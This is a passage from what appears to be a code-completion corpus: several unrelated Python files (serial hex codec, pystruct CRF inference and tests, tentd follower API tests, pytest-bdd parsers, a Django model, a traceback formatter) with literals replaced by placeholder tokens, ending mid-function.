<s> """<STR_LIT>""" <EOL> import codecs <EOL> import serial <EOL> try : <EOL> unicode <EOL> except ( NameError , AttributeError ) : <EOL> unicode = str <EOL> HEXDIGITS = '<STR_LIT>' <EOL> def hex_encode ( data , errors = '<STR_LIT:strict>' ) : <EOL> """<STR_LIT>""" <EOL> return ( serial . to_bytes ( [ int ( h , <NUM_LIT:16> ) for h in data . split ( ) ] ) , len ( data ) ) <EOL> def hex_decode ( data , errors = '<STR_LIT:strict>' ) : <EOL> """<STR_LIT>""" <EOL> return ( unicode ( '<STR_LIT>' . join ( '<STR_LIT>' . format ( ord ( b ) ) for b in serial . iterbytes ( data ) ) ) , len ( data ) ) <EOL> class Codec ( codecs . Codec ) : <EOL> def encode ( self , data , errors = '<STR_LIT:strict>' ) : <EOL> """<STR_LIT>""" <EOL> return serial . to_bytes ( [ int ( h , <NUM_LIT:16> ) for h in data . split ( ) ] ) <EOL> def decode ( self , data , errors = '<STR_LIT:strict>' ) : <EOL> """<STR_LIT>""" <EOL> return unicode ( '<STR_LIT>' . join ( '<STR_LIT>' . format ( ord ( b ) ) for b in serial . iterbytes ( data ) ) ) <EOL> class IncrementalEncoder ( codecs . IncrementalEncoder ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , errors = '<STR_LIT:strict>' ) : <EOL> self . errors = errors <EOL> self . state = <NUM_LIT:0> <EOL> def reset ( self ) : <EOL> self . state = <NUM_LIT:0> <EOL> def getstate ( self ) : <EOL> return self . state <EOL> def setstate ( self , state ) : <EOL> self . state = state <EOL> def encode ( self , data , final = False ) : <EOL> """<STR_LIT>""" <EOL> state = self . state <EOL> encoded = [ ] <EOL> for c in data . upper ( ) : <EOL> if c in HEXDIGITS : <EOL> z = HEXDIGITS . index ( c ) <EOL> if state : <EOL> encoded . append ( z + ( state & <NUM_LIT> ) ) <EOL> state = <NUM_LIT:0> <EOL> else : <EOL> state = <NUM_LIT> + ( z << <NUM_LIT:4> ) <EOL> elif c == '<STR_LIT:U+0020>' : <EOL> if state and self . errors == '<STR_LIT:strict>' : <EOL> raise UnicodeError ( '<STR_LIT>' ) <EOL> state = <NUM_LIT:0> <EOL> else : <EOL> if self . errors == '<STR_LIT:strict>' : <EOL> raise UnicodeError ( '<STR_LIT>' % c ) <EOL> self . state = state <EOL> return serial . to_bytes ( encoded ) <EOL> class IncrementalDecoder ( codecs . IncrementalDecoder ) : <EOL> """<STR_LIT>""" <EOL> def decode ( self , data , final = False ) : <EOL> return unicode ( '<STR_LIT>' . join ( '<STR_LIT>' . format ( ord ( b ) ) for b in serial . iterbytes ( data ) ) ) <EOL> class StreamWriter ( Codec , codecs . StreamWriter ) : <EOL> """<STR_LIT>""" <EOL> class StreamReader ( Codec , codecs . StreamReader ) : <EOL> """<STR_LIT>""" <EOL> def getregentry ( ) : <EOL> """<STR_LIT>""" <EOL> return codecs . CodecInfo ( <EOL> name = '<STR_LIT>' , <EOL> encode = hex_encode , <EOL> decode = hex_decode , <EOL> incrementalencoder = IncrementalEncoder , <EOL> incrementaldecoder = IncrementalDecoder , <EOL> streamwriter = StreamWriter , <EOL> streamreader = StreamReader , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from pystruct . datasets import load_letters <EOL> from pystruct . models import ChainCRF <EOL> from pystruct . learners import OneSlackSSVM <EOL> abc = "<STR_LIT>" <EOL> letters = load_letters ( ) <EOL> X , y , folds = letters [ '<STR_LIT:data>' ] , letters [ '<STR_LIT>' ] , letters [ '<STR_LIT>' ] <EOL> X , y = np . array ( X ) , np . array ( y ) <EOL> X_train , X_test = X [ folds == <NUM_LIT:1> ] , X [ folds != <NUM_LIT:1> ] <EOL> y_train , y_test = y [ folds == <NUM_LIT:1> ] , y [ folds != <NUM_LIT:1> ] <EOL> model = ChainCRF ( ) <EOL> ssvm = OneSlackSSVM ( model = model , C = <NUM_LIT> , tol = <NUM_LIT:0.1> , verbose = <NUM_LIT:3> , max_iter = <NUM_LIT:20> ) <EOL> ssvm . fit ( X_train , y_train ) <EOL> print ( "<STR_LIT>" % ssvm . score ( X_test , y_test ) ) </s>
<s> import numpy as np <EOL> from scipy import sparse <EOL> from . common import _validate_params <EOL> from . . utils . graph_functions import is_forest <EOL> def edges_to_graph ( edges , n_vertices = None ) : <EOL> if n_vertices is None : <EOL> n_vertices = np . max ( edges ) + <NUM_LIT:1> <EOL> graph = sparse . coo_matrix ( ( np . ones ( len ( edges ) ) , edges . T ) , <EOL> shape = ( n_vertices , n_vertices ) ) . tocsr ( ) <EOL> return graph <EOL> def is_chain ( edges , n_vertices ) : <EOL> """<STR_LIT>""" <EOL> return ( np . all ( edges [ : , <NUM_LIT:0> ] == np . arange ( <NUM_LIT:0> , n_vertices - <NUM_LIT:1> ) ) <EOL> and np . all ( edges [ : , <NUM_LIT:1> ] == np . arange ( <NUM_LIT:1> , n_vertices ) ) ) <EOL> def inference_max_product ( unary_potentials , pairwise_potentials , edges , <EOL> max_iter = <NUM_LIT:30> , damping = <NUM_LIT:0.5> , tol = <NUM_LIT> , relaxed = None ) : <EOL> """<STR_LIT>""" <EOL> from . _viterbi import viterbi <EOL> n_states , pairwise_potentials = _validate_params ( unary_potentials , pairwise_potentials , edges ) <EOL> if is_chain ( edges = edges , n_vertices = len ( unary_potentials ) ) : <EOL> y = viterbi ( unary_potentials . astype ( np . float ) . copy ( ) , <EOL> np . array ( pairwise_potentials , dtype = np . float ) ) <EOL> elif is_forest ( edges = edges , n_vertices = len ( unary_potentials ) ) : <EOL> y = tree_max_product ( unary_potentials , pairwise_potentials , edges ) <EOL> else : <EOL> y = iterative_max_product ( unary_potentials , pairwise_potentials , edges , <EOL> max_iter = max_iter , damping = damping ) <EOL> return y <EOL> def tree_max_product ( unary_potentials , pairwise_potentials , edges ) : <EOL> n_vertices , n_states = unary_potentials . shape <EOL> parents = - np . ones ( n_vertices , dtype = np . int ) <EOL> visited = np . zeros ( n_vertices , dtype = np . bool ) <EOL> neighbors = [ [ ] for i in range ( n_vertices ) ] <EOL> pairwise_weights = [ [ ] for i in range ( n_vertices ) ] <EOL> for pw , edge in zip ( pairwise_potentials , edges ) : <EOL> neighbors [ edge [ <NUM_LIT:0> ] ] . append ( edge [ <NUM_LIT:1> ] ) <EOL> pairwise_weights [ edge [ <NUM_LIT:0> ] ] . append ( pw ) <EOL> neighbors [ edge [ <NUM_LIT:1> ] ] . append ( edge [ <NUM_LIT:0> ] ) <EOL> pairwise_weights [ edge [ <NUM_LIT:1> ] ] . append ( pw . T ) <EOL> messages_forward = np . zeros ( ( n_vertices , n_states ) ) <EOL> messages_backward = np . zeros ( ( n_vertices , n_states ) ) <EOL> pw_forward = np . zeros ( ( n_vertices , n_states , n_states ) ) <EOL> traversal = [ ] <EOL> lonely = <NUM_LIT:0> <EOL> while lonely < n_vertices : <EOL> for i in range ( lonely , n_vertices ) : <EOL> if not visited [ i ] : <EOL> queue = [ i ] <EOL> lonely = i + <NUM_LIT:1> <EOL> visited [ i ] = True <EOL> break <EOL> lonely = n_vertices <EOL> while queue : <EOL> node = queue . pop ( <NUM_LIT:0> ) <EOL> traversal . append ( node ) <EOL> for pw , neighbor in zip ( pairwise_weights [ node ] , neighbors [ node ] ) : <EOL> if not visited [ neighbor ] : <EOL> parents [ neighbor ] = node <EOL> queue . append ( neighbor ) <EOL> visited [ neighbor ] = True <EOL> pw_forward [ neighbor ] = pw <EOL> elif not parents [ node ] == neighbor : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> for node in traversal [ : : - <NUM_LIT:1> ] : <EOL> parent = parents [ node ] <EOL> if parent != - <NUM_LIT:1> : <EOL> message = np . max ( messages_backward [ node ] + unary_potentials [ node ] + <EOL> pw_forward [ node ] , axis = <NUM_LIT:1> ) <EOL> message -= message . max ( ) <EOL> messages_backward [ parent ] += message <EOL> for node in traversal : <EOL> parent = parents [ node ] <EOL> if parent != - <NUM_LIT:1> : <EOL> message = messages_forward [ parent ] + unary_potentials [ parent ] + pw_forward [ node ] . T <EOL> message += messages_backward [ parent ] - np . max ( messages_backward [ node ] <EOL> + unary_potentials [ node ] <EOL> + pw_forward [ node ] , axis = <NUM_LIT:1> ) <EOL> message = message . max ( axis = <NUM_LIT:1> ) <EOL> message -= message . max ( ) <EOL> messages_forward [ node ] += message <EOL> return np . argmax ( unary_potentials + messages_forward + messages_backward , axis = <NUM_LIT:1> ) <EOL> def iterative_max_product ( unary_potentials , pairwise_potentials , edges , <EOL> max_iter = <NUM_LIT:10> , damping = <NUM_LIT> , tol = <NUM_LIT> ) : <EOL> n_edges = len ( edges ) <EOL> n_vertices , n_states = unary_potentials . shape <EOL> messages = np . zeros ( ( n_edges , <NUM_LIT:2> , n_states ) ) <EOL> all_incoming = np . zeros ( ( n_vertices , n_states ) ) <EOL> for i in range ( max_iter ) : <EOL> diff = <NUM_LIT:0> <EOL> for e , ( edge , pairwise ) in enumerate ( zip ( edges , pairwise_potentials ) ) : <EOL> update = ( all_incoming [ edge [ <NUM_LIT:0> ] ] + pairwise . T + <EOL> unary_potentials [ edge [ <NUM_LIT:0> ] ] <EOL> - messages [ e , <NUM_LIT:1> ] ) <EOL> old_message = messages [ e , <NUM_LIT:0> ] . copy ( ) <EOL> new_message = np . max ( update , axis = <NUM_LIT:1> ) <EOL> new_message -= np . max ( new_message ) <EOL> new_message = damping * old_message + ( <NUM_LIT:1> - damping ) * new_message <EOL> messages [ e , <NUM_LIT:0> ] = new_message <EOL> update = new_message - old_message <EOL> all_incoming [ edge [ <NUM_LIT:1> ] ] += update <EOL> diff += np . abs ( update ) . sum ( ) <EOL> update = ( all_incoming [ edge [ <NUM_LIT:1> ] ] + pairwise + <EOL> unary_potentials [ edge [ <NUM_LIT:1> ] ] <EOL> - messages [ e , <NUM_LIT:0> ] ) <EOL> old_message = messages [ e , <NUM_LIT:1> ] . copy ( ) <EOL> new_message = np . max ( update , axis = <NUM_LIT:1> ) <EOL> new_message -= np . max ( messages [ e , <NUM_LIT:1> ] ) <EOL> new_message = damping * old_message + ( <NUM_LIT:1> - damping ) * new_message <EOL> messages [ e , <NUM_LIT:1> ] = new_message <EOL> update = new_message - old_message <EOL> all_incoming [ edge [ <NUM_LIT:0> ] ] += update <EOL> diff += np . abs ( update ) . sum ( ) <EOL> if diff < tol : <EOL> break <EOL> return np . argmax ( all_incoming + unary_potentials , axis = <NUM_LIT:1> ) </s>
<s> import numpy as np <EOL> from nose . tools import assert_true , assert_false <EOL> from nose import SkipTest <EOL> from numpy . testing import assert_array_equal <EOL> from scipy import sparse <EOL> from pystruct . inference . maxprod import ( is_forest , inference_max_product , <EOL> iterative_max_product , is_chain ) <EOL> from pystruct . inference import inference_ad3 <EOL> from pystruct . datasets import generate_blocks , generate_blocks_multinomial <EOL> from pystruct . models import GridCRF <EOL> def test_is_chain ( ) : <EOL> chain = np . c_ [ np . arange ( <NUM_LIT:9> ) , np . arange ( <NUM_LIT:1> , <NUM_LIT:10> ) ] <EOL> assert_true ( is_chain ( chain , len ( chain ) + <NUM_LIT:1> ) ) <EOL> assert_false ( is_chain ( chain , len ( chain ) ) ) <EOL> circle = np . vstack ( [ chain , [ <NUM_LIT:9> , <NUM_LIT:0> ] ] ) <EOL> assert_false ( is_chain ( circle , len ( circle ) ) ) <EOL> assert_false ( is_chain ( chain [ : : - <NUM_LIT:1> ] , len ( chain ) + <NUM_LIT:1> ) ) <EOL> def test_is_forest ( ) : <EOL> chain = np . c_ [ np . arange ( <NUM_LIT:1> , <NUM_LIT:10> ) , np . arange ( <NUM_LIT:9> ) ] <EOL> assert_true ( is_forest ( chain , len ( chain ) + <NUM_LIT:1> ) ) <EOL> assert_true ( is_forest ( chain ) ) <EOL> circle = np . vstack ( [ chain , [ <NUM_LIT:9> , <NUM_LIT:0> ] ] ) <EOL> assert_false ( is_forest ( circle ) ) <EOL> assert_false ( is_forest ( circle , len ( chain ) + <NUM_LIT:1> ) ) <EOL> two_chains = np . vstack ( [ chain , chain + <NUM_LIT:10> ] ) <EOL> assert_true ( is_forest ( two_chains , <NUM_LIT:20> ) ) <EOL> disco_graph = np . vstack ( [ chain , circle + <NUM_LIT:10> ] ) <EOL> assert_false ( is_forest ( disco_graph ) ) <EOL> graph = np . random . uniform ( size = ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> edges = np . c_ [ graph . nonzero ( ) ] <EOL> assert_false ( is_forest ( edges ) ) <EOL> try : <EOL> from scipy . sparse . csgraph import minimum_spanning_tree <EOL> tree = minimum_spanning_tree ( sparse . csr_matrix ( graph ) ) <EOL> tree_edges = np . c_ [ tree . nonzero ( ) ] <EOL> assert_true ( is_forest ( tree_edges , <NUM_LIT:10> ) ) <EOL> assert_true ( is_forest ( tree_edges ) ) <EOL> except ImportError : <EOL> pass <EOL> def test_tree_max_product_chain ( ) : <EOL> rnd = np . random . RandomState ( <NUM_LIT:0> ) <EOL> forward = np . c_ [ np . arange ( <NUM_LIT:9> ) , np . arange ( <NUM_LIT:1> , <NUM_LIT:10> ) ] <EOL> backward = np . c_ [ np . arange ( <NUM_LIT:1> , <NUM_LIT:10> ) , np . arange ( <NUM_LIT:9> ) ] <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> unary_potentials = rnd . normal ( size = ( <NUM_LIT:10> , <NUM_LIT:3> ) ) <EOL> pairwise_potentials = rnd . normal ( size = ( <NUM_LIT:9> , <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> for chain in [ forward , backward ] : <EOL> result_ad3 = inference_ad3 ( unary_potentials , pairwise_potentials , <EOL> chain , branch_and_bound = True ) <EOL> result_mp = inference_max_product ( unary_potentials , <EOL> pairwise_potentials , chain ) <EOL> assert_array_equal ( result_ad3 , result_mp ) <EOL> def test_tree_max_product_tree ( ) : <EOL> try : <EOL> from scipy . sparse . csgraph import minimum_spanning_tree <EOL> except : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> rnd = np . random . RandomState ( <NUM_LIT:0> ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> graph = rnd . uniform ( size = ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> tree = minimum_spanning_tree ( sparse . csr_matrix ( graph ) ) <EOL> tree_edges = np . c_ [ tree . nonzero ( ) ] <EOL> unary_potentials = rnd . normal ( size = ( <NUM_LIT:10> , <NUM_LIT:3> ) ) <EOL> pairwise_potentials = rnd . normal ( size = ( <NUM_LIT:9> , <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> result_ad3 = inference_ad3 ( unary_potentials , pairwise_potentials , <EOL> tree_edges , branch_and_bound = True ) <EOL> result_mp = inference_max_product ( unary_potentials , <EOL> pairwise_potentials , tree_edges ) <EOL> assert_array_equal ( result_ad3 , result_mp ) <EOL> def test_iterative_max_product_chain ( ) : <EOL> rnd = np . random . RandomState ( <NUM_LIT:0> ) <EOL> chain = np . c_ [ np . arange ( <NUM_LIT:9> ) , np . arange ( <NUM_LIT:1> , <NUM_LIT:10> ) ] <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> unary_potentials = rnd . normal ( size = ( <NUM_LIT:10> , <NUM_LIT:3> ) ) <EOL> pairwise_potentials = rnd . normal ( size = ( <NUM_LIT:9> , <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> result_ad3 = inference_ad3 ( unary_potentials , pairwise_potentials , <EOL> chain , branch_and_bound = True ) <EOL> result_mp = iterative_max_product ( unary_potentials , <EOL> pairwise_potentials , chain ) <EOL> assert_array_equal ( result_ad3 , result_mp ) <EOL> def test_iterative_max_product_tree ( ) : <EOL> try : <EOL> from scipy . sparse . csgraph import minimum_spanning_tree <EOL> except : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> rnd = np . random . RandomState ( <NUM_LIT:0> ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> graph = rnd . uniform ( size = ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> tree = minimum_spanning_tree ( sparse . csr_matrix ( graph ) ) <EOL> tree_edges = np . c_ [ tree . nonzero ( ) ] <EOL> unary_potentials = rnd . normal ( size = ( <NUM_LIT:10> , <NUM_LIT:3> ) ) <EOL> pairwise_potentials = rnd . normal ( size = ( <NUM_LIT:9> , <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> result_ad3 = inference_ad3 ( unary_potentials , pairwise_potentials , <EOL> tree_edges , branch_and_bound = True ) <EOL> result_mp = iterative_max_product ( unary_potentials , <EOL> pairwise_potentials , tree_edges ) <EOL> assert_array_equal ( result_ad3 , result_mp ) <EOL> def test_max_product_binary_blocks ( ) : <EOL> X , Y = generate_blocks ( n_samples = <NUM_LIT:1> ) <EOL> x , y = X [ <NUM_LIT:0> ] , Y [ <NUM_LIT:0> ] <EOL> w = np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <NUM_LIT:1> , <EOL> <NUM_LIT:0> , <EOL> - <NUM_LIT:4> , <NUM_LIT:0> ] ) <EOL> crf = GridCRF ( inference_method = '<STR_LIT>' ) <EOL> crf . initialize ( X , Y ) <EOL> y_hat = crf . inference ( x , w ) <EOL> assert_array_equal ( y , y_hat ) <EOL> def test_max_product_multinomial_crf ( ) : <EOL> X , Y = generate_blocks_multinomial ( n_samples = <NUM_LIT:1> ) <EOL> x , y = X [ <NUM_LIT:0> ] , Y [ <NUM_LIT:0> ] <EOL> w = np . array ( [ <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <EOL> <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <EOL> <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] ) <EOL> crf = GridCRF ( inference_method = '<STR_LIT>' ) <EOL> crf . initialize ( X , Y ) <EOL> y_hat = crf . inference ( x , w ) <EOL> assert_array_equal ( y , y_hat ) </s>
<s> import numpy as np <EOL> def is_forest ( edges , n_vertices = None ) : <EOL> if n_vertices is not None and len ( edges ) > n_vertices - <NUM_LIT:1> : <EOL> return False <EOL> n_vertices = np . max ( edges ) + <NUM_LIT:1> <EOL> parents = - np . ones ( n_vertices ) <EOL> visited = np . zeros ( n_vertices , dtype = np . bool ) <EOL> neighbors = [ [ ] for i in range ( n_vertices ) ] <EOL> for edge in edges : <EOL> neighbors [ edge [ <NUM_LIT:0> ] ] . append ( edge [ <NUM_LIT:1> ] ) <EOL> neighbors [ edge [ <NUM_LIT:1> ] ] . append ( edge [ <NUM_LIT:0> ] ) <EOL> lonely = <NUM_LIT:0> <EOL> while lonely < n_vertices : <EOL> for i in range ( lonely , n_vertices ) : <EOL> if not visited [ i ] : <EOL> queue = [ i ] <EOL> lonely = i + <NUM_LIT:1> <EOL> visited [ i ] = True <EOL> break <EOL> lonely = n_vertices <EOL> while queue : <EOL> node = queue . pop ( ) <EOL> for neighbor in neighbors [ node ] : <EOL> if not visited [ neighbor ] : <EOL> parents [ neighbor ] = node <EOL> queue . append ( neighbor ) <EOL> visited [ neighbor ] = True <EOL> elif not parents [ node ] == neighbor : <EOL> return False <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> import requests <EOL> from flask import json <EOL> from py . test import raises , fixture <EOL> from tentd . documents . entity import Follower <EOL> from tentd . tests . http import POST , SPUT , SDELETE <EOL> from tentd . tests . mock import MockFunction , MockResponse <EOL> from tentd . utils . exceptions import APIBadRequest <EOL> PROFILE_FORMAT = '<STR_LIT>' <EOL> @ fixture <EOL> def follower_mocks ( request , monkeypatch ) : <EOL> follower_identity = '<STR_LIT>' <EOL> follower_api_root = '<STR_LIT>' <EOL> monkeypatch . setattr ( requests , '<STR_LIT>' , MockFunction ( ) ) <EOL> requests . head [ follower_identity ] = MockResponse ( <EOL> headers = { '<STR_LIT>' : PROFILE_FORMAT . format ( follower_api_root ) } ) <EOL> monkeypatch . setattr ( requests , '<STR_LIT>' , MockFunction ( ) ) <EOL> requests . get [ follower_api_root + '<STR_LIT>' ] = MockResponse ( ) <EOL> requests . get [ follower_api_root + '<STR_LIT>' ] = MockResponse ( <EOL> json = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : follower_identity , <EOL> "<STR_LIT>" : [ follower_api_root ] , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } } ) <EOL> assert isinstance ( requests . head , MockFunction ) <EOL> assert isinstance ( requests . get , MockFunction ) <EOL> @ request . addfinalizer <EOL> def teardown_mocks ( ) : <EOL> monkeypatch . delattr ( requests , '<STR_LIT>' ) <EOL> monkeypatch . delattr ( requests , '<STR_LIT>' ) <EOL> return { <EOL> '<STR_LIT>' : follower_identity , <EOL> '<STR_LIT>' : follower_api_root , <EOL> '<STR_LIT>' : follower_api_root + '<STR_LIT>' <EOL> } <EOL> @ fixture <EOL> def new_follower_mocks ( request , follower_mocks ) : <EOL> new_follower_identity = '<STR_LIT>' <EOL> new_follower_api_root = '<STR_LIT>' <EOL> requests . head [ new_follower_identity ] = MockResponse ( <EOL> headers = { '<STR_LIT>' : PROFILE_FORMAT . format ( new_follower_api_root ) } ) <EOL> requests . get [ new_follower_api_root + '<STR_LIT>' ] = MockResponse ( ) <EOL> requests . get [ new_follower_api_root + '<STR_LIT>' ] = MockResponse ( <EOL> json = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } } ) <EOL> follower_mocks . update ( { <EOL> '<STR_LIT>' : new_follower_identity , <EOL> '<STR_LIT>' : new_follower_api_root , <EOL> } ) <EOL> return follower_mocks <EOL> def test_create_follower ( entity , follower_mocks ) : <EOL> """<STR_LIT>""" <EOL> response = POST ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : follower_mocks [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT:all>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> Follower . objects . get ( id = response . json ( ) [ '<STR_LIT:id>' ] ) <EOL> assert requests . get . was_called ( follower_mocks [ '<STR_LIT>' ] ) <EOL> def test_create_invalid_follower ( entity , follower_mocks ) : <EOL> """<STR_LIT>""" <EOL> with raises ( APIBadRequest ) : <EOL> POST ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert requests . get . was_not_called ( follower_mocks [ '<STR_LIT>' ] ) <EOL> def test_update_follower ( entity , follower , new_follower_mocks ) : <EOL> """<STR_LIT>""" <EOL> response = SPUT ( '<STR_LIT>' , follower_id = follower . id , data = { <EOL> '<STR_LIT>' : new_follower_mocks [ '<STR_LIT>' ] } ) <EOL> updated_follower = Follower . objects . get ( id = follower . id ) <EOL> assert str ( follower . id ) == response . json ( ) [ '<STR_LIT:id>' ] <EOL> assert new_follower_mocks [ '<STR_LIT>' ] == response . json ( ) [ '<STR_LIT>' ] <EOL> assert new_follower_mocks [ '<STR_LIT>' ] == updated_follower . identity <EOL> def test_delete_follower ( follower ) : <EOL> SDELETE ( '<STR_LIT>' , follower_id = follower . id ) <EOL> assert Follower . objects . count ( ) == <NUM_LIT:0> <EOL> def test_delete_missing_follower ( entity ) : <EOL> """<STR_LIT>""" <EOL> with raises ( APIBadRequest ) : <EOL> SDELETE ( '<STR_LIT>' , follower_id = <NUM_LIT:0> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import re as base_re <EOL> import warnings <EOL> import parse as base_parse <EOL> from parse_type import cfparse as base_cfparse <EOL> import six <EOL> from . exceptions import InvalidStepParserError <EOL> RE_TYPE = type ( base_re . compile ( '<STR_LIT>' ) ) <EOL> class StepParser ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def parse_arguments ( self , name ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def is_matching ( self , name ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> class re ( StepParser ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( re , self ) . __init__ ( name ) <EOL> self . regex = base_re . compile ( self . name , * args , ** kwargs ) <EOL> def parse_arguments ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return self . regex . match ( name ) . groupdict ( ) <EOL> def is_matching ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return bool ( self . regex . match ( name ) ) <EOL> class parse ( StepParser ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( parse , self ) . __init__ ( name ) <EOL> self . parser = base_parse . compile ( self . name , * args , ** kwargs ) <EOL> def parse_arguments ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return self . parser . parse ( name ) . named <EOL> def is_matching ( self , name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return bool ( self . parser . parse ( name ) ) <EOL> except ValueError : <EOL> return False <EOL> class cfparse ( parse ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( parse , self ) . __init__ ( name ) <EOL> self . parser = base_cfparse . Parser ( self . name , * args , ** kwargs ) <EOL> class string ( StepParser ) : <EOL> """<STR_LIT>""" <EOL> def parse_arguments ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def is_matching ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return self . name == name <EOL> def get_parser ( step_name ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( step_name , RE_TYPE ) : <EOL> warn = ( <EOL> '<STR_LIT>' . format ( <EOL> step_name . pattern ) <EOL> ) <EOL> warnings . warn ( warn ) <EOL> print ( warn ) <EOL> return re ( step_name . pattern , flags = step_name . flags ) <EOL> elif isinstance ( step_name , six . string_types ) : <EOL> return string ( step_name ) <EOL> elif not hasattr ( step_name , '<STR_LIT>' ) or not hasattr ( step_name , '<STR_LIT>' ) : <EOL> raise InvalidStepParserError ( step_name ) <EOL> else : <EOL> return step_name </s>
<s> """<STR_LIT>""" <EOL> import pytest <EOL> import re <EOL> import six <EOL> from pytest_bdd import ( <EOL> scenario , <EOL> given , <EOL> then , <EOL> parsers , <EOL> exceptions , <EOL> ) <EOL> def test_scenario_not_found ( request ) : <EOL> """<STR_LIT>""" <EOL> with pytest . raises ( exceptions . ScenarioNotFound ) as exc_info : <EOL> scenario ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> assert six . text_type ( exc_info . value ) . startswith ( <EOL> '<STR_LIT>' <EOL> . format ( feature_path = request . fspath . join ( '<STR_LIT:..>' , '<STR_LIT>' ) ) ) <EOL> @ given ( '<STR_LIT>' ) <EOL> def comments ( ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ then ( parsers . parse ( '<STR_LIT>' ) ) <EOL> def a_comment ( acomment ) : <EOL> """<STR_LIT>""" <EOL> assert re . search ( '<STR_LIT>' , acomment ) <EOL> def test_scenario_comments ( request ) : <EOL> """<STR_LIT>""" <EOL> @ scenario ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test ( ) : <EOL> pass <EOL> @ scenario ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test2 ( ) : <EOL> pass <EOL> test ( request ) <EOL> test2 ( request ) <EOL> def test_scenario_not_decorator ( request ) : <EOL> """<STR_LIT>""" <EOL> func = scenario ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> with pytest . raises ( exceptions . ScenarioIsDecoratorOnly ) : <EOL> func ( request ) </s>
<s> from django . db import models <EOL> class Item ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> def __str__ ( self ) : <EOL> return self . name </s>
<s> import types <EOL> def format_exception_only ( etype , value ) : <EOL> """<STR_LIT>""" <EOL> if ( isinstance ( etype , BaseException ) or <EOL> isinstance ( etype , types . InstanceType ) or <EOL> etype is None or type ( etype ) is str ) : <EOL> return [ _format_final_exc_line ( etype , value ) ] <EOL> stype = etype . __name__ <EOL> if not issubclass ( etype , SyntaxError ) : <EOL> return [ _format_final_exc_line ( stype , value ) ] <EOL> lines = [ ] <EOL> try : <EOL> msg , ( filename , lineno , offset , badline ) = value . args <EOL> except Exception : <EOL> pass <EOL> else : <EOL> filename = filename or "<STR_LIT>" <EOL> lines . append ( '<STR_LIT>' % ( filename , lineno ) ) <EOL> if badline is not None : <EOL> if isinstance ( badline , bytes ) : <EOL> badline = badline . decode ( '<STR_LIT:utf-8>' , '<STR_LIT:replace>' ) <EOL> lines . append ( u'<STR_LIT>' % badline . strip ( ) ) <EOL> if offset is not None : <EOL> caretspace = badline . rstrip ( '<STR_LIT:\n>' ) [ : offset ] . lstrip ( ) <EOL> caretspace = ( ( c . isspace ( ) and c or '<STR_LIT:U+0020>' ) for c in caretspace ) <EOL> lines . append ( '<STR_LIT>' % '<STR_LIT>' . join ( caretspace ) ) <EOL> value = msg <EOL> lines . append ( _format_final_exc_line ( stype , value ) ) <EOL> return lines <EOL> def _format_final_exc_line ( etype , value ) : <EOL> """<STR_LIT>""" <EOL> valuestr = _some_str ( value ) <EOL> if value is None or not valuestr : <EOL> line = "<STR_LIT>" % etype <EOL> else : <EOL> line = "<STR_LIT>" % ( etype , 